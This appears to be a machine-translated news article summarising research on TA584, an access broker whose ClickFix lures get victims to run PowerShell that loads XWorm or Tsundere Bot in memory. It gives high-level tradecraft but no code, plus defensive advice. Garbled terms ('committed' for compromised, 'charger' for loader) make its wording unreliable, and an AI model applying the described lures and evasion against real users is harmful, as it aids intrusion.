The initial access business TA584 and Tsundere Bot pave the way to the Ransomware

An actor specialized in selling initial network access, known by analysts as TA584, has reincreased the level of its activity and does so by combining new tools that increase the risk that an intrusion will end up in a ransomware attack. This campaign, documented by Proofpoint researchers, exhibits a chain of commitment carefully designed to avoid static detections and convert legitimate accounts committed into entry doors to corporate infrastructure.

The most striking piece in this puzzle is the incorporation of Tsundere Bot, a malware platform as a service that operates over Node.js and that was described by Kaspersky Last year. Tsundere does not only act as a back door and charger; it also uses an unconventional technique to get the address of its control server: it extracts information from the Etherium blockchain (a variation of what some researchers called "concealing" techniques in block chains). This flexibility and sophistication fits the role that TA584 plays in the cybercrime ecosystem: providing valuable access that other extortion groups can use.

According to Proofpoint's report, the current operation is part of hundreds of old accounts already committed that are used to send malicious emails through legitimate mass shipping services, such as SendGrid or Amazon Simple Email Service. The following is not a simple attachment or a generic link: each recipient receives a single URL and the infrastructure filters traffic by geographical location and IP; in addition, redirection chains are used that often pass through third-party traffic management systems ("TDS") such as Keitaro. The aim is for only specific victims to reach the next step.

If the visitor passes the filters, he first finds a CAPTCHA and then a page that appears to be a repair service (known as ClickFix in the analyses). That page urges you to run a PowerShell command: by doing so, the machine downloads and runs an osfuscated script in memory that it loads, without leaving obvious files on disk, either XWorm - a known remote access Trojan - or Tsundere Bot. After the execution, the browser is redirected to a safe site to disguise the intrusion. This mode of operation reduces the surface that security tools review and complicates signature-based detection.

TA584's trajectory is not static: Proofpoint has observed this actor using a wide variety of malware families over the years, from infostealers like Ursnif to post-exploitation frameworks like Cobalt Strike. The volume of campaigns reported increased by the end of 2025 over the first quarter, and the geography of the targets expanded beyond North America and the UK / Ireland, reaching Germany, other European countries and Australia. This expansion suggests a clear intention to diversify markets and monetize access in multiple regions.

Tsundere Bot, for its part, incorporates features that make it especially attractive for operators seeking persistence and lateral exploration: it collects system information to profile potential victims, can run arbitrary JavaScript code sent by its command center, allows to use committed machines such as SOCKS proxies and even has an internal market where "bots" can be bought and sold. In addition, the installer includes an alternate control address encoded as backup in case the recovery from the block chain fails and avoids being implemented in systems configured with typical languages of the Commonwealth of Independent States, which points to a deliberate effort to target operators or victims of the CIS region.

All this explains why Proofpoint researchers consider that Tsundere Bot infections, when they are part of TA584 operations, have a high potential to lead to ransomware incidents. In practice, the initial access sale makes it easier for other more specialized groups - so-called Ransomware operators - to rent or buy already authenticated input and only have to deploy their encryption or exfiltration load to maximize the damage.

For security organizations and professionals, the lesson is twofold: it is not enough to rely on the validation of sender or basic mail controls; it is also necessary to monitor more subtle patterns, such as the use of legitimate shipping suppliers, unique URLs per recipient, redirection chains and loads that are executed exclusively in memory. The best practice guides to ransomware and initial access recommend strengthening authentication, segregating privileges, monitoring processes in memory and educating employees not to run commands that ask them for unreliable web pages. Official resources such as the U.S. agency CISA collect measures and recommendations that can help to harden defenses: CISA - Ransomware Information.

In an ecosystem where access vendors and malware platforms as service are professionalized, prevention requires combining policies, technology and training. Offensive innovation does not stop and defenders cannot do it either.: monitor engagement chains, update rules to detect living-off-the-land techniques (such as PowerShell abuse) and analyze memory behaviors are measures that today make the difference between a frustrated attempt and a cost-effective intrusion for attackers.

If you want to deepen the technical findings and examples of the attack chain, the Proofpoint report is a detailed and recommended reading for its view on TA584 and the tactics observed: Proofpoint - TA584 analysis. To understand the technical component of Tsundere Bot and its use of the blockchain as a resilience vector, the Kaspersky report provides valuable context: Kaspersky - Tsundere Bot.